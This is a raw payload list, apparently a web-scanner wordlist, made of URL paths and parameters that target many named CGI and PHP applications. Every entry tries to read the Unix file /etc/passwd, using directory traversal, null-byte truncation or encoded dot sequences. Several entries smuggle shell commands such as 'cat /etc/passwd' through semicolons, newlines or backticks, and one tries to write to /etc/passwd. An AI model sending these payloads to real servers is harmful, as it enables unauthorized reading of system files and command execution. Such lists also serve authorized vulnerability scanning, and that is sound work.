index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
index.php?|=../../../../../../../../../etc/passwd
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
DomainFiles/*//../../../../../../../../../../etc/passwd
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
index.php?download=/etc/passwd
index.php?page=../../../../../../../../../../etc/passwd
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phptonuke.php?filnavn=/etc/passwd
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
viewpage.php?file=/etc/passwd
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=../../../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/opendir.php?/etc/passwd
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/viewsource?/etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=/../../../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
page.cgi?../../../../../../../../../../etc/passwd
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
athenareg.php?pass=%20;cat%20/etc/passwd
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
search?NS-query-pat=../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
................../etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/campas?%0acat%0a/etc/passwd%0a
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
cgi-bin/phf?QNikto=root%0Acat%20/etc/passwd%20
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
.../.../.../.../.../.../.../.../.../.../etc/passwd
etc/passwd
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
tmp_view.php?file=/etc/passwd
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
///////../../../../../../etc/passwd
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
etc/passwd
directory.php?dir=%3Bcat%20/etc/passwd
content/base/build/explorer/none.php?/etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
export.php?what=../../../../../../../../../../../../etc/passwd%00
3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
phpmyadminexport.php?what=../../../../../../../../../../../../etc/passwd%00
pmaexport.php?what=../../../../../../../../../../../../etc/passwd%00
~nobody/etc/passwd
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
shoutbox.php?conf=../../../../../../../etc/passwd
admin/system.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=cat%20/etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/ion-p?page=../../../../../etc/passwd
gallery/index.php?include=../../../../../../../../../etc/passwd
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
phprocketaddin/?page=../../../../../../../../../../etc/passwd
axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd